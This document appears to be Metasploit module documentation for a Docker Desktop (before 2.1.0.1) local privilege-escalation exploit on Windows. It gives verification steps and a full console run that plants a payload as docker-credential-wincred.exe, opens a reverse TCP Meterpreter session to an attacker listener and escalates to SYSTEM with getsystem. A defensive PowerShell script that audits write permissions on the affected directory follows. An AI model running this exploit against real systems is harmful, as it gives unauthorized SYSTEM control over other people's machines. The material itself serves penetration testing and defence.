## Vulnerable Application

  Docker Desktop Community Edition before 2.1.0.1
  https://download.docker.com/win/stable/28905/Docker%20for%20Windows%20Installer.exe

## Verification Steps

  1. Install a Docker Desktop Community Edition version before 2.1.0.1
  2. Start msfconsole
  3. Get a session with basic privileges
  4. Do: ```use exploit/windows/local/docker_credential_wincred```
  5. Do: ```set SESSION <sess_no>```
  6. Do: ```run```
  7. Using an administrator cmd shell on the target, run ```docker login```
  8. You should get a shell you can elevate with ```getsystem```.

## Scenarios

### Tested on Docker Community Edition 2.0.0.0 running on Windows 10 x64 Release 1803

```
msf5 exploit(windows/local/docker_credential_wincred) > show options

Module options (exploit/windows/local/docker_credential_wincred):

   Name         Current Setting                            Required  Description
   ----         ---------------                            --------  -----------
   PROGRAMDATA  C:\ProgramData\DockerDesktop\version-bin\  no        Path to docker version-bin.
   SESSION                                                 yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(windows/local/docker_credential_wincred) > set session 1
session => 1
msf5 exploit(windows/local/docker_credential_wincred) > check

[*] Docker version 18.09.0, build 4d60db4
[*] The target appears to be vulnerable.
msf5 exploit(windows/local/docker_credential_wincred) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Docker version 18.09.0, build 4d60db4
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] payload_pathname = C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Making Payload
[*] Uploading Payload to C:\ProgramData\DockerDesktop\version-bin\\docker-credential-wincred.exe
[*] Payload Upload Complete
[*] Waiting for user to attempt to login
[*] Sending stage (180291 bytes) to 192.168.132.125
[*] Meterpreter session 3 opened (192.168.135.168:4444 -> 192.168.132.125:49766) at 2020-04-15 16:32:09 -0500

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
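
The run above shows the payload being written to `C:\ProgramData\DockerDesktop\version-bin\docker-credential-wincred.exe` from a session with basic privileges. The PowerShell audit below is an added example, not part of the module or of Docker: it reports which principals outside a trusted set can write to that directory (or to the nearest existing parent when it is absent) and, if the helper is present, its signature and hash. The trusted-SID list, the parameter names and the `Get-UntrustedWriter` function are assumptions of this example.

```powershell
# Added example, not part of the Metasploit module.
param(
    # Default taken from the PROGRAMDATA option shown above.
    [string]$VersionBin = 'C:\ProgramData\DockerDesktop\version-bin',
    [string]$HelperName = 'docker-credential-wincred.exe'
)

# Assumption: only SYSTEM, Administrators and TrustedInstaller should hold write access.
$trusted = 'S-1-5-18', 'S-1-5-32-544',
           'S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464'
$sidType = [System.Security.Principal.SecurityIdentifier]
# Rights that allow planting or replacing a file, plus GENERIC_WRITE and GENERIC_ALL.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership' -bor 0x50000000

function Get-UntrustedWriter([string]$Path) {
    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -eq 'Allow' -and $trusted -notcontains $sid -and
            ([int]$ace.FileSystemRights -band $writeMask) -ne 0) {
            [pscustomobject]@{ Path = $Path; Sid = $sid; Finding = "write ACE: $($ace.FileSystemRights)" }
        }
    }
    $owner = $acl.GetOwner($sidType).Value
    if ($trusted -notcontains $owner) {
        [pscustomobject]@{ Path = $Path; Sid = $owner; Finding = 'owner is not a trusted principal' }
    }
}

# If version-bin is absent, audit the nearest existing parent: write access there
# is enough to create the directory and place a helper in it.
$dir = $VersionBin
while ($dir -and -not (Test-Path -LiteralPath $dir)) { $dir = Split-Path -Path $dir -Parent }
$findings = @()
if ($dir) { $findings += @(Get-UntrustedWriter $dir) }

$helper = Join-Path $VersionBin $HelperName
if (Test-Path -LiteralPath $helper -PathType Leaf) {
    $findings += @(Get-UntrustedWriter $helper)
    $sig = Get-AuthenticodeSignature -LiteralPath $helper
    [pscustomobject]@{
        File      = $helper
        Signature = $sig.Status
        Signer    = $sig.SignerCertificate.Subject
        SHA256    = (Get-FileHash -LiteralPath $helper -Algorithm SHA256).Hash
    } | Format-List
}
$findings | Format-Table -AutoSize
```

An empty findings table means no principal outside the trusted set holds write access or ownership on the audited path; inherit-only entries are reported too, since they apply to files created beneath the directory.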
